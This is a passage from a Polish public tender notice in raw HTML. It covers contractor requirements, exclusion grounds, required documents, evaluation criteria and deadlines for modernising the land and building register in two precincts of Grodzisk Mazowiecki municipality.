id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">5.2.2.	posiadania zdolności technicznej i zawodowej do wykonania zamówienia. W celu potwierdzenia spełnienia tego warunku Zamawiający żąda: a) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (sprzętu geodezyjnego, samochodów, komputerów, oprogramowania – Wykonawca potwierdza spełnienie powyższego warunku podpisując oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik Nr 3 do SIWZ) oraz wypełniając załącznik nr 8 do SIWZ „Potencjał techniczny” – do którego należy dołączyć kopie świadectw atestacji sprzętu geodezyjnego,b) wykazu osób skierowanych do realizacji zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, zakresem wykonywanych przez nie czynności, charakterem zatrudnienia (czy na umowę o pracę) oraz informacją o dysponowaniu tymi osobami – Wykonawca potwierdza spełnienie powyższego warunku podpisując oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik Nr 3 do SIWZ) oraz wypełniając załącznik nr 9 do SIWZ „Wykaz osób”, c)	zrealizowania przez Wykonawcę w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednego zamówienia na wykonanie modernizacji ewidencji gruntów i budynków, przeprowadzonej w trybie art.24a ustawy z dnia 17 maja 1989r. –Prawo geodezyjne i kartograficzne lub zamówienia na opracowanie dokumentacji geodezyjnej do celów prawnych, przy czym łączna wartość zamówień nie może być mniejsza niż 80 000,00 zł brutto (słownie: osiemdziesiąt tysięcy złotych 00/100) a wartość każdego zamówienia nie może być mniejsza niż 20 000,00 zł brutto (słownie: dwadzieścia tysięcy złotych 11/100) – Wykonawca potwierdza ten warunek wypełniając załącznik Nr 3 do SIWZ oraz załącznik nr 7 - „Wykaz prac wykonanych przez Wykonawcę …” oraz załączając referencje bądź inne dokumenty wystawione przez podmioty na rzecz których wskazane prace zostały wykonane,</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">6.2.1.	Aktualny odpis z właściwego rejestru, jeśli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt. 1 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w przypadku osób fizycznych aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej; 6.2.2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1b pzp – załącznik nr 3 do SIWZ;6.2.3.	Oświadczenie iż Wykonawca dysponuje odpowiednim potencjałem w zakresie zdolności technicznej lub zawodowej do wykonania zamówienia (art. 22 ust. 1b pkt. 3 pzp) – Załącznik Nr 3 do SIWZ oraz załącznik nr 7 „Wykaz prac wykonanych przez Wykonawcę ….”, załącznik nr 8 do SIWZ „Potencjał techniczny” i załącznik nr 9 do SIWZ „Wykaz osób”</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">5.2.1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: Wykonawca potwierdza spełnianie powyższego warunku załączając do oferty dokumenty potwierdzające posiadanie uprawnień do wykonywania prac geodezyjnych z zakresów nr 1 i nr 2 określonych w art. 43 ustawy z dnia 17 maja 1989 r. – Prawo geodezyjne (t. j. Dz. U. z 2020 r. poz. 276 ze zm.) lub dokumenty pracowników posiadających takie uprawnienia. Na każdą z części zamówienia należy wskazać co najmniej po jednej osobie posiadającej uprawnienia z zakresu nr 1 i po jednej osobie posiadającej uprawnienia z zakresu nr 2. Przy składaniu oferty na dwie części zamówienia osoby te mogą zostać wykazane w obu ofertach jednocześnie.5.2.2.	posiadania zdolności technicznej i zawodowej do wykonania zamówienia. W celu potwierdzenia spełnienia tego warunku Zamawiający żąda: a) wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (sprzętu geodezyjnego, samochodów, komputerów, oprogramowania – Wykonawca potwierdza spełnienie powyższego warunku podpisując oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik Nr 3 do SIWZ) oraz wypełniając załącznik nr 8 do SIWZ „Potencjał techniczny” – do którego należy dołączyć kopie świadectw atestacji sprzętu geodezyjnego,b) wykazu osób skierowanych do realizacji zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, zakresem wykonywanych przez nie czynności, charakterem zatrudnienia (czy na umowę o pracę) oraz informacją o dysponowaniu tymi osobami – Wykonawca potwierdza spełnienie powyższego warunku podpisując oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik Nr 3 do SIWZ) oraz wypełniając załącznik nr 9 do SIWZ „Wykaz osób”, c)	zrealizowania przez Wykonawcę w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednego zamówienia na wykonanie modernizacji ewidencji gruntów i budynków, przeprowadzonej w trybie art.24a ustawy z dnia 17 maja 1989r. –Prawo geodezyjne i kartograficzne lub zamówienia na opracowanie dokumentacji geodezyjnej do celów prawnych, przy czym łączna wartość zamówień nie może być mniejsza niż 80 000,00 zł brutto (słownie: osiemdziesiąt tysięcy złotych 00/100) a wartość każdego zamówienia nie może być mniejsza niż 20 000,00 zł brutto (słownie: dwadzieścia tysięcy złotych 11/100) – Wykonawca potwierdza ten warunek wypełniając załącznik Nr 3 do SIWZ oraz załącznik nr 7 - „Wykaz prac wykonanych przez Wykonawcę …” oraz załączając referencje bądź inne dokumenty wystawione przez podmioty na rzecz których wskazane prace zostały wykonane,</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Nie dotyczy</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.	Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru – załącznik nr 2a i/lub 2b do SIWZ;2.	Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego z art. 22 ust. 1b pzp – załącznik nr 3 do SIWZ;3.	Oświadczenie o braku podstaw do wykluczenia z powodu niespełniania warunków o których mowa w art. 24 ust. 5 Prawa zamówień publicznych - załącznik nr 4 do SIWZ;4.	Oświadczenie o posiadaniu uprawnień do wykonywania określonej działalności – załącznik Nr 5 do SIWZ oraz dokumenty potwierdzające posiadanie uprawnień do wykonywania prac geodezyjnych z zakresów nr 1 i 2 określonych w art. 43 ustawy z dnia 17 maja 1989 r. – Prawo geodezyjne (t. j. Dz. U. z 2015 r. poz. 520 ze zm.) lub dokumenty pracowników posiadających takie uprawnienia;5.	Parafowany przez wykonawcę wzór umowy – załącznik Nr 6 do SIWZ.6.	Wykaz prac (załącznik nr 7 do SIWZ).7.	Potencjał techniczny (załącznik nr 8 do SIWZ).8.	Wykaz pracowników (załącznik nr 9 do SIWZ).9.	Wzór oświadczenia od Wykonawcy w zakresie wypełniania obowiązków informacyjnych wynikających z RODO (Załącznik nr 10 do SIWZ)</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">8.1.	Każda oferta musi być zabezpieczona wadium: - dla części I zamówienia wadium wynosi: 7500 zł - dla części II zamówienia wadium wynosi: 2000 zł</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Charakter zatrudnienia osób mających wpływ na jakość pracy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>25,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający dopuszcza możliwość dokonania zmian w umowie, pod warunkiem spełnienia przesłanek ustawowych określonych w przepisie art. 144 ustawy pzp.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-08-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Modernizacja ewidencji gruntów i budynków dla wybranych obrębów z jednostki ewidencyjnej gmina Grodzisk Mazowiecki ( 140405_5): obręb Odrano Wola ( 140504_5.0025)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>3.1.	Przedmiotem zamówienia jest wykonanie modernizacji ewidencji gruntów i budynków zgodnie z projektem modernizacji uzgodnionym przez Mazowieckiego Wojewódzkiego Inspektora Nadzoru Geodezyjnego i Kartograficznego, dla dwóch obrębów obszaru wiejskiego gminy Grodzisk Mazowiecki w powiecie grodziskim , w podziale na części: część nr 1 – wykonanie modernizacji ewidencji gruntów i budynków dla obrębu ewidencyjnego Odrano Wola (140504_5.0025).	część nr 2 - wykonanie modernizacji ewidencji gruntów i budynków dla obrębu ewidencyjnego Wólka Grodziska (140504_5.0033).3.2.	Do obowiązków Wykonawcy związanych z modernizacją ewidencji gruntów i budynków należeć będzie:1)	analiza materiałów przekazanych Wykonawcy do realizacji zadania,2)	wykonanie badania ksiąg wieczystych wykazanych w ewidencji gruntów pod względem zgodności treści ujawnionej w dziale I KW z danymi przedmiotowymi rejestru ewidencji gruntów. W przypadku stwierdzenia rozbieżności oznaczenia nieruchomości należy zbadać dokumenty złożone do księgi wieczystej pod względem istnienia map lub planów możliwych do wykorzystania w procesie modernizacji. Z przeprowadzonych porównań i badań dokumentów geodezyjnych złożonych do księgi wieczystej, Wykonawca sporządzi zestawienia w/g wzoru uzgodnionego z Zamawiającym;3)	dokonanie weryfikacji poprawności wpisów praw do działek ewidencyjnych:a)	co do których w prowadzonym rejestrze gruntów brak jest ustalonego właściciela, a także ustalonego tytułu do działki, a w rejestrze gruntów wykazani są: samoistni posiadacze, władający i użytkownicy. b)	